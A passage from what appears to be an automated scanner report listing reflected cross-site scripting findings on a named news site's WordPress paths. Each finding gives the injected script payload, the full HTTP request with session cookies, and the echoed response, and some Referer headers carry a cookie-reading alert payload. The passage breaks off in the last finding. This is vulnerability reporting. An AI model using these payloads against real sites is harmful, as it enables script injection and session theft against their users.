4.337. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18120"><script>alert(1)</script>22d9e782dd3 was submitted in the REST URL parameter 2. This input was echoed as 18120\"><script>alert(1)</script>22d9e782dd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes18120"><script>alert(1)</script>22d9e782dd3/shadow/iepngfix.htc HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:54:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:54:37 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:54:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes18120\"><script>alert(1)</script>22d9e782dd3/shadow/iepngfix.htc'; }); return true;" >
...[SNIP]...

4.338. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90633"><script>alert(1)</script>411b24f9cf was submitted in the REST URL parameter 3. This input was echoed as 90633\"><script>alert(1)</script>411b24f9cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow90633"><script>alert(1)</script>411b24f9cf/iepngfix.htc HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:56:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:56:23 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:56:23 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow90633\"><script>alert(1)</script>411b24f9cf/iepngfix.htc'; }); return true;" >
...[SNIP]...

4.339. http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/iepngfix.htc

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e177e"><script>alert(1)</script>9096259822e was submitted in the REST URL parameter 4. This input was echoed as e177e\"><script>alert(1)</script>9096259822e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/iepngfix.htce177e"><script>alert(1)</script>9096259822e HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; lastpost=b5ecd3c5dc5b053e7b22b8e1502a67b3; PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510; fbsetting_018ba7e06c4505193be6bdac2b0628d9=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; crep=show;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:57:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:57:59 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:57:59 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/iepngfix.htce177e\"><script>alert(1)</script>9096259822e'; }); return true;" >
...[SNIP]...

4.340. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41302"><script>alert(1)</script>e87a12b68da was submitted in the REST URL parameter 1. This input was echoed as 41302\"><script>alert(1)</script>e87a12b68da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content41302"><script>alert(1)</script>e87a12b68da/themes/shadow/style.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:06:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:06:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:06:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content41302\"><script>alert(1)</script>e87a12b68da/themes/shadow/style.css'; }); return true;" >
...[SNIP]...

4.341. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed22"><script>alert(1)</script>5a2e316bbc0 was submitted in the REST URL parameter 2. This input was echoed as 9ed22\"><script>alert(1)</script>5a2e316bbc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes9ed22"><script>alert(1)</script>5a2e316bbc0/shadow/style.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:07:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:07:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:07:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes9ed22\"><script>alert(1)</script>5a2e316bbc0/shadow/style.css'; }); return true;" >
...[SNIP]...

4.342. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97ab4"><script>alert(1)</script>3c035f3b0b7 was submitted in the REST URL parameter 3. This input was echoed as 97ab4\"><script>alert(1)</script>3c035f3b0b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow97ab4"><script>alert(1)</script>3c035f3b0b7/style.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:06 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow97ab4\"><script>alert(1)</script>3c035f3b0b7/style.css'; }); return true;" >
...[SNIP]...

4.343. http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/themes/shadow/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5175e"><script>alert(1)</script>c88bcf20bbe was submitted in the REST URL parameter 4. This input was echoed as 5175e\"><script>alert(1)</script>c88bcf20bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/shadow/style.css5175e"><script>alert(1)</script>c88bcf20bbe HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:08:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:08:48 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:08:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 50999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/themes/shadow/style.css5175e\"><script>alert(1)</script>c88bcf20bbe'; }); return true;" >
...[SNIP]...

4.344. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5c7a"><script>alert(1)</script>287ad5da87 was submitted in the REST URL parameter 1. This input was echoed as b5c7a\"><script>alert(1)</script>287ad5da87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesb5c7a"><script>alert(1)</script>287ad5da87/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:05 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includesb5c7a\"><script>alert(1)</script>287ad5da87/js/jquery/jquery.js?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.345. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d169"><script>alert(1)</script>c3aaf9c5f26 was submitted in the REST URL parameter 2. This input was echoed as 6d169\"><script>alert(1)</script>c3aaf9c5f26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js6d169"><script>alert(1)</script>c3aaf9c5f26/jquery/jquery.js?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:57 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js6d169\"><script>alert(1)</script>c3aaf9c5f26/jquery/jquery.js?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.346. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 945b8"><script>alert(1)</script>61e796b665 was submitted in the REST URL parameter 3. This input was echoed as 945b8\"><script>alert(1)</script>61e796b665 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery945b8"><script>alert(1)</script>61e796b665/jquery.js?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:50 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery945b8\"><script>alert(1)</script>61e796b665/jquery.js?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.347. http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4f40"><script>alert(1)</script>f83f8fcb684 was submitted in the REST URL parameter 4. This input was echoed as f4f40\"><script>alert(1)</script>f83f8fcb684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.jsf4f40"><script>alert(1)</script>f83f8fcb684?ver=1.3.2 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=0780e8d631c08885b1144b4b3d40c5f5
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:58 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/jquery.jsf4f40\"><script>alert(1)</script>f83f8fcb684?ver=1.3.2'; }); return true;" >
...[SNIP]...

4.348. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ae6"><script>alert(1)</script>6cd9f7aaf41 was submitted in the REST URL parameter 1. This input was echoed as 26ae6\"><script>alert(1)</script>6cd9f7aaf41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes26ae6"><script>alert(1)</script>6cd9f7aaf41/js/jquery/ui.core.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
